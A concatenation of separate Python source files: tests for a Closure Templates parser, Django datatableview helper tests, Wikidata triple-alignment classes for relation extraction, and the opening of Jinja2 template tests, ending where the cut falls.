@alias.setter
def alias(self,a):
"""
Set alias.
"""
try:
if self._alias != None and self._alias != a and a != None:
err = "Could not set alias to {:} because it is already set to {:}".format(a,self._alias)
raise ValueError(err)
except AttributeError:
pass
self._alias = a
self._initialize_fit_results()
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2012 Moskvitin Andrey <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
import unittest
import sys
sys.path[0:0] = [""]
from pyclosuretempaltes.parser import *
class TestExpressionParser(unittest.TestCase):
def setUp(self):
pass
def testLiterals(self):
self.assertEqual(parseExpression("'Hello world'"), 'Hello world')
print parseExpression("''")
self.assertEqual(parseExpression("''"), '')
self.assertEqual(parseExpression("5"), 5)
self.assertEqual(parseExpression("3.14"), 3.14)
def testVars(self):
a = parseExpression(' $var ')
self.assertIsInstance(a, Variable)
self.assertEqual(a.name, 'var')
b = parseExpression('$x.y')
self.assertIsInstance(b, DotRef)
self.assertEqual(b.name, 'y')
self.assertIsInstance(b.expr, Variable)
self.assertEqual(b.expr.name, 'x')
c = parseExpression('$x.1.y')
self.assertIsInstance(c, DotRef)
self.assertEqual(c.name, 'y')
self.assertIsInstance(c.expr, ARef)
self.assertEqual(c.expr.position, 1)
self.assertIsInstance(c.expr.expr, Variable)
self.assertEqual(c.expr.expr.name, 'x')
d = parseExpression('$x[0].y')
self.assertIsInstance(d, DotRef)
self.assertEqual(d.name, 'y')
self.assertIsInstance(d.expr, ARef)
self.assertEqual(d.expr.position, 0)
self.assertIsInstance(d.expr.expr, Variable)
self.assertEqual(d.expr.expr.name, 'x')
e = parseExpression('$x[$z].y')
self.assertIsInstance(e, DotRef)
self.assertEqual(e.name, 'y')
self.assertIsInstance(e.expr, ARef)
self.assertIsInstance(e.expr.position, Variable)
self.assertEqual(e.expr.position.name, 'z')
self.assertIsInstance(e.expr.expr, Variable)
self.assertEqual(e.expr.expr.name, 'x')
f = parseExpression('$x[0][1]')
self.assertIsInstance(f, ARef)
self.assertEqual(f.position, 1)
self.assertIsInstance(f.expr, ARef)
self.assertEqual(f.expr.position, 0)
self.assertIsInstance(f.expr.expr, Variable)
self.assertEqual(f.expr.expr.name, 'x')
g = parseExpression('$x[0][1][$y]')
self.assertIsInstance(g, ARef)
self.assertIsInstance(g.position, Variable)
self.assertEqual(g.position.name, 'y')
self.assertIsInstance(g.expr, ARef)
self.assertEqual(g.expr.position, 1)
self.assertIsInstance(g.expr.expr, ARef)
self.assertEqual(g.expr.expr.position, 0)
self.assertIsInstance(g.expr.expr.expr, Variable)
self.assertEqual(g.expr.expr.expr.name, 'x')
def testOperators(self):
a = parseExpression('-$x')
self.assertIsInstance(a, Operator)
self.assertEqual(a.op, 'neg')
self.assertIsInstance(a.args[0], Variable)
self.assertEqual(a.args[0].name, 'x')
b = parseExpression('not $x')
self.assertIsInstance(b, Operator)
self.assertEqual(b.op, 'not')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
c = parseExpression(' $x + $y ')
self.assertIsInstance(c, Operator)
self.assertEqual(c.op, '+')
self.assertEqual(len(c.args), 2)
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertIsInstance(c.args[1], Variable)
self.assertEqual(c.args[1].name, 'y')
d = parseExpression('2 + 2')
self.assertIsInstance(d, Operator)
self.assertEqual(d.args, [2, 2])
e = parseExpression(' $x - $y ')
self.assertIsInstance(e, Operator)
self.assertEqual(e.op, '-')
self.assertEqual(len(e.args), 2)
self.assertIsInstance(e.args[0], Variable)
self.assertEqual(e.args[0].name, 'x')
self.assertIsInstance(e.args[1], Variable)
self.assertEqual(e.args[1].name, 'y')
self.assertEqual(parseExpression(' $x * $y ').op, '*')
self.assertEqual(parseExpression(' $x/$y ').op, '/')
self.assertEqual(parseExpression(' $x % $y ').op, '%')
self.assertEqual(parseExpression('$x > $y').op, '>')
self.assertEqual(parseExpression('$x < $y').op, '<')
self.assertEqual(parseExpression('$x>=$y').op, '>=')
self.assertEqual(parseExpression('$x<=$y').op, '<=')
self.assertEqual(parseExpression('$x==$y').op, '==')
self.assertEqual(parseExpression('$x!=$y').op, '!=')
self.assertEqual(parseExpression('$x and $y').op, 'and')
self.assertEqual(parseExpression('$x or $y').op, 'or')
#f = parseExpression('28 - 2 + (3 + 4)')
#self.assertIsInstance(
def testTernaryOperator(self):
a = parseExpression("max(2, $x ? min($x, $y ? 3 : 5 + 4, 6) : 4)")
self.assertIsInstance(a, Funcall)
self.assertEqual(a.name, 'max')
self.assertEqual(a.args[0], 2)
b = a.args[1]
self.assertIsInstance(b, Operator)
self.assertEqual(b.op, 'if')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
self.assertEqual(b.args[2], 4)
c = b.args[1]
self.assertIsInstance(c, Funcall)
self.assertEqual(c.name, 'min')
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertEqual(c.args[2], 6)
d = c.args[1]
self.assertIsInstance(d, Operator)
self.assertEqual(d.op, 'if')
self.assertIsInstance(d.args[0], Variable)
self.assertEqual(d.args[0].name, 'y')
self.assertEqual(d.args[1], 3)
e = d.args[2]
self.assertIsInstance(e, Operator)
self.assertEqual(e.op, '+')
self.assertEqual(e.args, [5, 4])
def testFunctions(self):
a = parseExpression("hasData()")
self.assertIsInstance(a, Funcall)
self.assertEqual(a.name, 'hasData')
self.assertEqual(a.args, [])
b = parseExpression('min($x, $y)')
self.assertIsInstance(b, Funcall)
self.assertEqual(b.name, 'min')
self.assertIsInstance(b.args[0], Variable)
self.assertEqual(b.args[0].name, 'x')
self.assertIsInstance(b.args[1], Variable)
self.assertEqual(b.args[1].name, 'y')
c = parseExpression('min($x, max(5, $y))')
self.assertIsInstance(c, Funcall)
self.assertEqual(c.name, 'min')
self.assertIsInstance(c.args[0], Variable)
self.assertEqual(c.args[0].name, 'x')
self.assertIsInstance(c.args[1], Funcall)
self.assertEqual(c.args[1].name, 'max')
self.assertEqual(c.args[1].args[0], 5)
self.assertIsInstance(c.args[1].args[1], Variable)
self.assertEqual(c.args[1].args[1].name, 'y')
class TestCommandParser(unittest.TestCase):
def setUp(self):
pass
def testTemplateProps(self):
a = parseSingleTemplate('{template testA autoescape="true"}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'testA')
self.assertEqual(a.props.get('autoescape'), True)
b = parseSingleTemplate('{template testB private="false"}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'testB')
self.assertEqual(b.props.get('private'), False)
c = parseSingleTemplate('{template testC autoescape="false" private="true"}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'testC')
self.assertEqual(c.props.get('autoescape'), False)
self.assertEqual(c.props.get('private'), True)
d = parseSingleTemplate("""{template testD}
Hello
{/template}""")
self.assertIsInstance(d, Template)
self.assertEqual(d.name, 'testD')
self.assertEqual(d.props.get('autoescape'), None)
self.assertEqual(d.props.get('private'), None)
self.assertIsInstance(d.code, CodeBlock)
self.assertEqual(d.code[0], 'Hello')
def testSubstitions(self):
a = parseSingleTemplate('{template substitions}{sp}{nil}{\\r}{\\n}{\\t}{lb}{rb}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'substitions')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(''.join([item.char for item in a.code]), ' \r\n\t{}')
def testPrint(self):
a = parseSingleTemplate('{template helloName}Hello {$name}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'helloName')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(a.code[0], 'Hello ')
self.assertIsInstance(a.code[1], Print)
self.assertIsInstance(a.code[1].expr, Variable)
self.assertEqual(a.code[1].expr.name, 'name')
b = parseSingleTemplate('{template test}{2 + 2}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'test')
self.assertIsInstance(b.code, CodeBlock)
self.assertIsInstance(b.code[0], Print)
self.assertIsInstance(b.code[0].expr, Operator)
self.assertEqual(b.code[0].expr.op, '+')
self.assertEqual(b.code[0].expr.args, [2, 2])
c = parseSingleTemplate('{template test}{2 + 2 |noAutoescape}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'test')
self.assertIsInstance(c.code, CodeBlock)
self.assertIsInstance(c.code[0], Print)
self.assertIsInstance(c.code[0].expr, Operator)
self.assertEqual(c.code[0].expr.op, '+')
self.assertEqual(c.code[0].expr.args, [2, 2])
self.assertEqual(c.code[0].directives.get('noAutoescape'), True)
d = parseSingleTemplate('{template test}{2 + 2 |id}{/template}')
self.assertIsInstance(d, Template)
self.assertEqual(d.name, 'test')
self.assertIsInstance(d.code, CodeBlock)
self.assertIsInstance(d.code[0], Print)
self.assertIsInstance(d.code[0].expr, Operator)
self.assertEqual(d.code[0].expr.op, '+')
self.assertEqual(d.code[0].expr.args, [2, 2])
self.assertEqual(d.code[0].directives.get('noAutoescape'), None)
self.assertEqual(d.code[0].directives.get('id'), True)
e = parseSingleTemplate("""{template test}
{2 + 2 |noAutoescape |id |escapeHtml |escapeUri |escapeJs |insertWordBreaks:5}
{/template}""")
self.assertIsInstance(e, Template)
self.assertEqual(e.name, 'test')
self.assertIsInstance(e.code, CodeBlock)
self.assertIsInstance(e.code[0], Print)
self.assertIsInstance(e.code[0].expr, Operator)
self.assertEqual(e.code[0].expr.op, '+')
self.assertEqual(e.code[0].expr.args, [2, 2])
self.assertEqual(e.code[0].directives.get('noAutoescape'), True)
self.assertEqual(e.code[0].directives.get('id'), True)
self.assertEqual(e.code[0].directives.get('escapeHtml'), True)
self.assertEqual(e.code[0].directives.get('escapeUri'), True)
self.assertEqual(e.code[0].directives.get('escapeJs'), True)
self.assertEqual(e.code[0].directives.get('insertWordBreaks'), 5)
def testLiteral(self):
a = parseSingleTemplate('{template literalTest}{literal}Test {$x} {foreach $foo in $bar}{$foo}{/foreach}{/literal}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'literalTest')
self.assertIsInstance(a.code, CodeBlock)
self.assertIsInstance(a.code[0], LiteralTag)
self.assertEqual(a.code[0].text, 'Test {$x} {foreach $foo in $bar}{$foo}{/foreach}')
def testIf(self):
a = parseSingleTemplate('{template ifTest}{if $x}Hello {$x}{/if}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'ifTest')
self.assertIsInstance(a.code, CodeBlock)
self.assertEqual(len(a.code), 1)
self.assertIsInstance(a.code[0], If)
self.assertIsInstance(a.code[0][0][0], Variable)
self.assertEqual(a.code[0][0][0].name, 'x')
self.assertIsInstance(a.code[0][0][1], CodeBlock)
self.assertEqual(a.code[0][0][1][0], 'Hello ')
self.assertIsInstance(a.code[0][0][1][1], Print)
self.assertIsInstance(a.code[0][0][1][1].expr, Variable)
self.assertEqual(a.code[0][0][1][1].expr.name, 'x')
b = parseSingleTemplate('{template ifTest}{if $x}Hello {$x}{elseif $y}By {$y}{else}Hello world{/if}{/template}').code[0]
self.assertIsInstance(b, If)
self.assertIsInstance(b[0][0], Variable)
self.assertEqual(b[0][0].name, 'x')
self.assertEqual(b[0][1][0], 'Hello ')
self.assertIsInstance(b[0][1][1], Print)
self.assertIsInstance(b[0][1][1].expr, Variable)
self.assertEqual(b[0][1][1].expr.name, 'x')
self.assertIsInstance(b[1][0], Variable)
self.assertEqual(b[1][0].name, 'y')
self.assertEqual(b[1][1][0], 'By ')
self.assertIsInstance(b[1][1][1], Print)
self.assertIsInstance(b[1][1][1].expr, Variable)
self.assertEqual(b[1][1][1].expr.name, 'y')
self.assertEqual(b[2][0], True)
self.assertEqual(b[2][1][0], 'Hello world')
def testSwitch1(self):
a = parseSingleTemplate('{template switchTest}{switch $x}{case 1}hello world{case 2, 3, 4}by-by{/switch}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'switchTest')
self.assertIsInstance(a.code, CodeBlock)
b = a.code[0]
self.assertIsInstance(b, Switch)
self.assertIsInstance(b.expr, Variable)
self.assertEqual(b.expr.name, 'x')
self.assertEqual(b.cases[0][0], [1])
self.assertEqual(list(b.cases[0][1]), ['hello world'])
self.assertEqual(b.cases[1][0], [2, 3, 4])
self.assertEqual(list(b.cases[1][1]), ['by-by'])
def testForeach(self):
a = parseSingleTemplate('{template test}{foreach $x in $y.foo }{$x}{ifempty}Hello{/foreach}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'test')
self.assertIsInstance(a.code, CodeBlock)
b = a.code[0]
self.assertIsInstance(b, Foreach)
self.assertIsInstance(b.var, Variable)
self.assertEqual(b.var.name, 'x')
self.assertIsInstance(b.expr, DotRef)
self.assertEqual(b.expr.name, 'foo')
self.assertIsInstance(b.expr.expr, Variable)
self.assertEqual(b.expr.expr.name, 'y')
c = b.code
self.assertIsInstance(c, CodeBlock)
self.assertIsInstance(c[0], Print)
self.assertIsInstance(c[0].expr, Variable)
self.assertEqual(c[0].expr.name, 'x')
d = b.ifEmptyCode
self.assertIsInstance(d, CodeBlock)
self.assertEqual(d[0], 'Hello')
def testFor(self):
a = parseSingleTemplate('{template test}{for $x in range(10)} ! {/for}{/template}')
self.assertIsInstance(a, Template)
self.assertEqual(a.name, 'test')
self.assertIsInstance(a.code, CodeBlock)
self.assertIsInstance(a.code[0], For)
self.assertEqual(a.code[0].range, [10])
self.assertEqual(a.code[0].code[0], '!')
b = parseSingleTemplate('{template test}{for $x in range(4, 10)} ! {/for}{/template}')
self.assertIsInstance(b, Template)
self.assertEqual(b.name, 'test')
self.assertIsInstance(b.code, CodeBlock)
self.assertIsInstance(b.code[0], For)
self.assertEqual(b.code[0].range, [4, 10])
self.assertEqual(b.code[0].code[0], '!')
c = parseSingleTemplate('{template test}{for $x in range(4, 10, 2)} ! {/for}{/template}')
self.assertIsInstance(c, Template)
self.assertEqual(c.name, 'test')
self.assertIsInstance(c.code, CodeBlock)
self.assertIsInstance(c.code[0], For)
self.assertEqual(c.code[0].range, [4, 10, 2])
self.assertEqual(c.code[0].code[0], '!')
def testCall(self):
a = parseSingleTemplate('{template test}{call helloName1 data=\"$x\" /}{/template}')
self.assertIsInstance(a.code[0], Call)
self.assertEqual(a.code[0].name, 'helloName1')
self.assertIsInstance(a.code[0].data, Variable)
self.assertEqual(a.code[0].data.name, 'x')
self.assertEqual(a.code[0].params, [])
b = parseSingleTemplate('{template test}{call helloName2}{param name: $x /}{/call}{/template}')
self.assertIsInstance(b.code[0], Call)
self.assertEqual(b.code[0].name, 'helloName2')
self.assertEqual(b.code[0].data, None)
self.assertEqual(len(b.code[0].params), 1)
self.assertEqual(b.code[0].params[0][0], 'name')
self.assertIsInstance(b.code[0].params[0][1], Variable)
self.assertEqual(b.code[0].params[0][1].name, 'x')
c = parseSingleTemplate("""{template test}
{call helloName3 data=\"$data\"}
{param a: $x /}
{param b}Hello {$y}{/param}
{/call}
{/template}""")
self.assertIsInstance(c.code[0], Call)
self.assertEqual(c.code[0].name, 'helloName3')
self.assertIsInstance(c.code[0].data, Variable)
self.assertEqual(c.code[0].data.name, 'data')
self.assertEqual(len(c.code[0].params), 2)
self.assertEqual(c.code[0].params[0][0], 'a')
self.assertIsInstance(c.code[0].params[0][1], Variable)
self.assertEqual(c.code[0].params[0][1].name, 'x')
self.assertEqual(c.code[0].params[1][0], 'b')
self.assertIsInstance(c.code[0].params[1][1], CodeBlock)
self.assertEqual(c.code[0].params[1][1][0], 'Hello ')
self.assertIsInstance(c.code[0].params[1][1][1], Print)
self.assertIsInstance(c.code[0].params[1][1][1].expr, Variable)
self.assertEqual(c.code[0].params[1][1][1].expr.name, 'y')
d = parseSingleTemplate('{template test}{call name=\"$name\" /}{/template}')
self.assertIsInstance(d.code[0], Call)
self.assertIsInstance(d.code[0].name, Variable)
self.assertEqual(d.code[0].name.name, 'name')
self.assertEqual(d.code[0].data, None)
self.assertEqual(d.code[0].params, [])
e = parseSingleTemplate('{template test}{call name=\"$x\" data=\"all\" /}{/template}')
self.assertIsInstance(e.code[0], Call)
self.assertIsInstance(e.code[0].name, Variable)
self.assertEqual(e.code[0].name.name, 'x')
self.assertEqual(e.code[0].data, True)
self.assertEqual(e.code[0].params, [])
# def testWhitespaces(self):
# pass
if __name__ == "__main__":
unittest.main()
|
|
# -*- encoding: utf-8 -*-
from datetime import datetime
from functools import partial
import django
from datatableview import helpers
import six
from .testcase import DatatableViewTestCase
from .test_app.models import ExampleModel, RelatedM2MModel
if django.VERSION < (1, 7):
test_data_fixture = 'test_data_legacy.json'
else:
test_data_fixture = 'test_data.json'
class HelpersTests(DatatableViewTestCase):
fixtures = [test_data_fixture]
def test_link_to_model(self):
""" Verifies that link_to_model works. """
helper = helpers.link_to_model
# Verify that a model without get_absolute_url() raises a complaint
related = RelatedM2MModel.objects.get(pk=1)
with self.assertRaises(AttributeError) as cm:
helper(related)
self.assertEqual(str(cm.exception), "'RelatedM2MModel' object has no attribute 'get_absolute_url'")
# Verify simple use
instance = ExampleModel.objects.get(pk=1)
output = helper(instance)
self.assertEqual(output, '<a href="#1">ExampleModel 1</a>')
# Verify text override
output = helper(instance, text="Special text")
self.assertEqual(output, '<a href="#1">Special text</a>')
# Verify ``key`` access to transition an instance to a related field
instance = ExampleModel.objects.get(pk=2)
secondary_helper = helper(key=lambda o: o.related)
output = secondary_helper(instance)
self.assertEqual(output, '<a href="#1">RelatedModel object</a>')
# Verify ``key`` access version of custom text
output = secondary_helper(instance, text="Special text")
self.assertEqual(output, '<a href="#1">Special text</a>')
def test_make_boolean_checkmark(self):
""" Verifies that make_boolean_checkmark works. """
helper = helpers.make_boolean_checkmark
# Verify simple use
output = helper("True-ish value")
self.assertEqual(output, '✔')
output = helper("")
self.assertEqual(output, '✘')
# Verify custom values
output = helper("True-ish value", true_value="Yes", false_value="No")
self.assertEqual(output, 'Yes')
output = helper("", true_value="Yes", false_value="No")
self.assertEqual(output, 'No')
def test_format_date(self):
""" Verifies that format_date works. """
helper = helpers.format_date
# Verify simple use
data = datetime.now()
secondary_helper = helper("%m/%d/%Y")
output = secondary_helper(data)
self.assertEqual(output, data.strftime("%m/%d/%Y"))
# Verify that None objects get swallowed without complaint.
# This helps promise that the helper won't blow up for models.DateTimeField that are allowed
# to be null.
output = secondary_helper(None)
self.assertEqual(output, "")
def test_format(self):
""" Verifies that format works. """
helper = helpers.format
# Verify simple use
data = 1234567890
secondary_helper = helper("{0:,}")
output = secondary_helper(data)
self.assertEqual(output, "{0:,}".format(data))
# Verify ``cast`` argument
data = "1234.56789"
secondary_helper = helper("{0:.2f}", cast=float)
output = secondary_helper(data)
self.assertEqual(output, "{0:.2f}".format(float(data)))
def test_through_filter(self):
""" Verifies that through_filter works. """
helper = helpers.through_filter
target_function = lambda data, arg=None: (data, arg)
# Verify simple use
data = "Data string"
secondary_helper = helper(target_function)
output = secondary_helper(data)
self.assertEqual(output, (data, None))
# Verify ``arg`` argument
secondary_helper = helper(target_function, arg="Arg data")
output = secondary_helper(data)
self.assertEqual(output, (data, "Arg data"))
def test_itemgetter(self):
""" Verifies that itemgetter works. """
helper = helpers.itemgetter
# Verify simple index access
data = list(range(5))
secondary_helper = helper(-1)
output = secondary_helper(data)
self.assertEqual(output, data[-1])
# Verify slicing access
secondary_helper = helper(slice(1, 3))
output = secondary_helper(data)
self.assertEqual(output, data[1:3])
# Verify ellipsis works for strings
data = str(range(10))
secondary_helper = helper(slice(0, 5), ellipsis=True)
output = secondary_helper(data)
self.assertEqual(output, data[:5] + "...")
# Verify ellipsis can be customized
secondary_helper = helper(slice(0, 5), ellipsis="custom")
output = secondary_helper(data)
self.assertEqual(output, data[:5] + "custom")
# Verify ellipsis does nothing for non-string data types
data = range(10)
output = secondary_helper(data)
self.assertEqual(output, data[:5])
def test_attrgetter(self):
""" Verifies that attrgetter works. """
helper = helpers.attrgetter
# Verify simple attr lookup
data = ExampleModel.objects.get(pk=1)
secondary_helper = helper('pk')
output = secondary_helper(data)
self.assertEqual(output, data.pk)
# Verify bad attribrute lookup
data = ExampleModel.objects.get(pk=1)
secondary_helper = helper('bad field name')
with self.assertRaises(AttributeError) as cm:
output = secondary_helper(data)
self.assertEqual(str(cm.exception), "'ExampleModel' object has no attribute 'bad field name'")
def test_make_xeditable(self):
""" Verifies that make_xeditable works. """
helper = helpers.make_xeditable
# Items that the helper normally expects in a callback context
internals = {'field_name': 'name'}
# Verify chain calls don't trigger rendering
secondary_helper = helper()
tertiary_helper = secondary_helper()
self.assertEqual(type(secondary_helper), partial)
self.assertEqual(type(tertiary_helper), partial)
# Verify chain ends with provision of a value
data = ExampleModel.objects.get(pk=1)
# This needs a "url" arg because we want to test successful use
output = tertiary_helper(data, url="/", **internals)
self.assertTrue(isinstance(output, six.string_types))
# Verify that no "view" kwarg means the url is required from the call
with self.assertRaises(ValueError) as cm:
tertiary_helper(data, **internals)
self.assertEqual(str(cm.exception), "'make_xeditable' cannot determine a value for 'url'.")
# Verify kwargs accumulate
kwargs1 = { 'type': 'textarea' }
kwargs2 = { 'other_arg': True }
secondary_helper = helper(**kwargs1)
expected_kwargs = dict(kwargs1, extra_attrs=[])
self.assertEqual(secondary_helper.keywords, expected_kwargs)
tertiary_helper = secondary_helper(**kwargs2)
expected_kwargs = dict(kwargs1, **dict(kwargs2, extra_attrs=[]))
self.assertEqual(tertiary_helper.keywords, expected_kwargs)
# Verify default kwarg names end up as attributes
data = ExampleModel.objects.get(pk=1)
kwargs = {
'pk': "PK DATA",
'type': "TYPE DATA",
'url': "URL DATA",
'source': "SOURCE DATA",
'title': "TITLE DATA",
'placeholder': "PLACEHOLDER DATA",
# Extra stuff not in anticipated to appear in rendered string
'special': "SPECIAL DATA",
'data_custom': "DATA-CUSTOM DATA",
}
secondary_helper = helper(**kwargs)
output = secondary_helper(data, **internals)
expected_output = """
<a href="#" data-name="name"
data-pk="PK DATA"
data-placeholder="PLACEHOLDER DATA"
data-source="SOURCE DATA"
data-title="TITLE DATA"
data-type="TYPE DATA"
data-url="URL DATA"
data-value="1"
data-xeditable="xeditable">
ExampleModel 1
</a>
"""
self.assertHTMLEqual(output, expected_output)
# Verify that explicit additions via ``extra_attrs`` allows kwargs to appear in HTML as
# "data-*" attributes.
secondary_helper = helper(extra_attrs=['special', 'data_custom', 'fake'], **kwargs)
output = secondary_helper(data, **internals)
expected_output = """
<a href="#" data-name="name"
data-pk="PK DATA"
data-placeholder="PLACEHOLDER DATA"
data-source="SOURCE DATA"
data-title="TITLE DATA"
data-type="TYPE DATA"
data-url="URL DATA"
data-value="1"
data-special="SPECIAL DATA"
data-custom="DATA-CUSTOM DATA"
data-xeditable="xeditable">
ExampleModel 1
</a>
"""
self.assertHTMLEqual(output, expected_output)
|
|
from pipeline import *
from utils import triplereader
import itertools
class NoSubjectAlign(BasePipeline):
"""
Following the assumption in NoSUB [1] and [2] that sentences in one paragraph all share the same subject.
[1] Augenstein, Isabelle, Diana Maynard, and Fabio Ciravegna. "Distantly supervised web relation extraction for knowledge base population." Semantic Web 7.4 (2016): 335-349.
[2] WikiReading: A Novel Large-scale Language Understanding Task over Wikipedia Hewlett et al. 2016
"""
def __init__(self, triples_reference):
self.annotator_name = "NoSubject-Triple-aligner"
# pd.read_csv(triples_file, sep="\t", names=["subject", "predicate", "object"]).set_index(['subject', 'object'])
self.wikidata_triples = triples_reference
def run(self, document):
"""
:param: input document to align its sentences with triples
:return:
"""
for sid, (start, end) in enumerate(document.sentences_boundaries):
# Getting sentence subject
# Every sentence has main entity as subject
# if subject already tagged use it if not use only the URI
# entities in sentence
es = [j for j in document.entities if j.boundaries[0] >= start and j.boundaries[1] <= end]
e_sub = [j for j in es if j.uri == document.uri]
if len(e_sub) > 0:
subject = e_sub[0]
else:
subject = Entity(document.uri,
boundaries=None,
surfaceform=document.title,
annotator=self.annotator_name)
for o in es:
if subject.uri == o.uri:
continue
predicates = self.wikidata_triples.get(subject.uri, o.uri)
#predicates = self.wikidata_triples["%s\t%s" % (subject.uri, o.uri)]
for pred in predicates:
pred = Entity(pred,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subject,
predicate=pred,
object=o,
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
class SimpleAligner(BasePipeline):
"""
Take a document with tagged entities and match them with one another.
Example : If we have three entities Q1, Q2 and Q3, it will try to find a
property binding Q1 with Q2, Q2 with Q1, Q2 with Q3 etc...
It won't match Q1 with itself, but if Q1 == Q2, it will try to find a
property between them
"""
def __init__(self, triples_reference):
"""
:param: input document containing the triples (two entities and
the property that bind them together)
"""
self.annotator_name = "Simple-Aligner"
self.wikidata_triples = triples_reference
def run(self, document):
"""
:param: input document to align its sentences with triples
:return:
"""
for sid, (start, end) in enumerate(document.sentences_boundaries):
es = [j for j in document.entities if j.boundaries[0] >= start and j.boundaries[1] <= end]
# We use permutations to match every entity with all the others
for o in itertools.permutations(es, 2):
if o[0].uri == o[1].uri:
continue
# We grab the predicates
#predicates = self.wikidata_triples["%s\t%s" % (o[0].uri, o[1].uri)]
predicates = self.wikidata_triples.get(o[0].uri, o[1].uri)
# And create the triples
for pred in predicates:
pred = Entity(pred,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=o[0],
predicate=pred,
object=o[1],
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
class SPOAligner(BasePipeline):
def __init__(self, triples_reference):
self.annotator_name = "SPOAligner"
# Add here the name of the annotators creating entities with something else than properties
self.annotator_list = ["Wikidata_Spotlight_Entity_Linker", "Simple_Coreference", "Date_Linker"]
self.wikidata_triples = triples_reference
def run(self, document):
for sid, (start, end) in enumerate(document.sentences_boundaries):
# Entities created by the Entity linkers and the Coreference
es = [j for j in document.entities if j.boundaries[0] >= start
and j.boundaries[1] <= end
and j.annotator in self.annotator_list]
# Entities created by the Property Linker
p = [j for j in document.entities if j.boundaries[0] >= start
and j.boundaries[1] <= end
and j.annotator == 'Wikidata_Property_Linker']
for o in itertools.permutations(es, 2):
if o[0].uri == o[1].uri:
continue
predicates = self.wikidata_triples.get(o[0].uri, o[1].uri)
#predicates = self.wikidata_triples["%s\t%s" % (o[0].uri, o[1].uri)]
# And create the triples
for kbpred in predicates:
for spred in p:
if kbpred == spred.uri:
triple = Triple(subject=o[0],
predicate=spred,
object=o[1],
sentence_id=sid,
annotator=self.annotator_name
)
document.triples.append(triple)
return document
class NoAligner(BasePipeline):
"""
Take a document with tagged entities and add the triples that are not
in the document, without alignment in the text.
"""
def __init__(self, all_triples):
"""
:param: input document containing the triples (two entities and
the property that bind them together)
"""
self.annotator_name = "No-Aligner"
self.wikidata_triples = all_triples
def makeTriple(self, s, p, o):
subj = Entity(s,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
pred = Entity(p,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
obj = Entity(o,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subj,
predicate=pred,
object=obj,
sentence_id=None,
annotator=self.annotator_name)
return triple
def run(self, document):
tall = []
tagged_entities = set([e.uri for e in document.entities])
for t in self.wikidata_triples.get(document.docid):
# noagliner aligns triples only:
# document.uri is the subject of the triples
# document.uri is the object of the triple and its subject is linked by entity linker
if t[0] not in tagged_entities and t[2] == document.uri:
continue
tall.append(t[0]+"\t"+t[1]+"\t"+t[2])
tall = set(tall)
tdoc = set([t.subject.uri+"\t"+t.predicate.uri+"\t"+t.object.uri for t in document.triples])
tadd = tall - tdoc
for t in tadd:
triple = self.makeTriple(*t.split("\t"))
document.triples.append(triple)
return document
class NoAlignerLimitedProperties(BasePipeline):
"""
Take a document with tagged entities and add the triples that are not
in the document, without alignment in the text.
Limit the missing entities to the entities with properties
that appear in the first sentence.
"""
def __init__(self, all_triples):
"""
:param: input document containing the triples (two entities and
the property that bind them together)
"""
self.annotator_name = "No-Aligner"
self.wikidata_triples = all_triples
def makeTriple(self, s, p, o):
subj = Entity(s,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
pred = Entity(p,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
obj = Entity(o,
boundaries=None,
surfaceform=None,
annotator=self.annotator_name)
triple = Triple(subject=subj,
predicate=pred,
object=obj,
sentence_id=None,
annotator=self.annotator_name)
return triple
#get all properties that are used in the first sentence
def getAllowedProperties(self, triples):
allowed_properties = []
for t in triples:
if t.sentence_id == 0:
allowed_properties.append(t.predicate.uri)
return allowed_properties
def run(self, document):
allowed_properties = self.getAllowedProperties(document.triples)
for t in self.wikidata_triples.get(document.docid):
if not allowed_properties or not t[1] in allowed_properties:
continue
# TODO: Better comparison
exists = False
for doc_t in document.triples:
if doc_t.subject.uri == t[0] and doc_t.predicate.uri == t[1] and doc_t.object.uri == t[2]:
exists = True
if not exists:
triple = self.makeTriple(t[0], t[1], t[2])
document.triples.append(triple)
return document
|
|
import pytest
from markupsafe import Markup
from jinja2 import Environment
from jinja2 import TemplateAssertionError
from jinja2 import TemplateRuntimeError
class MyDict(dict):
pass
class TestTestsCase:
def test_defined(self, env):
tmpl = env.from_string("{{ missing is defined }}|{{ true is defined }}")
assert tmpl.render() == "False|True"
def test_even(self, env):
tmpl = env.from_string("""{{ 1 is even }}|{{ 2 is even }}""")
assert tmpl.render() == "False|True"
def test_odd(self, env):
tmpl = env.from_string("""{{ 1 is odd }}|{{ 2 is odd }}""")
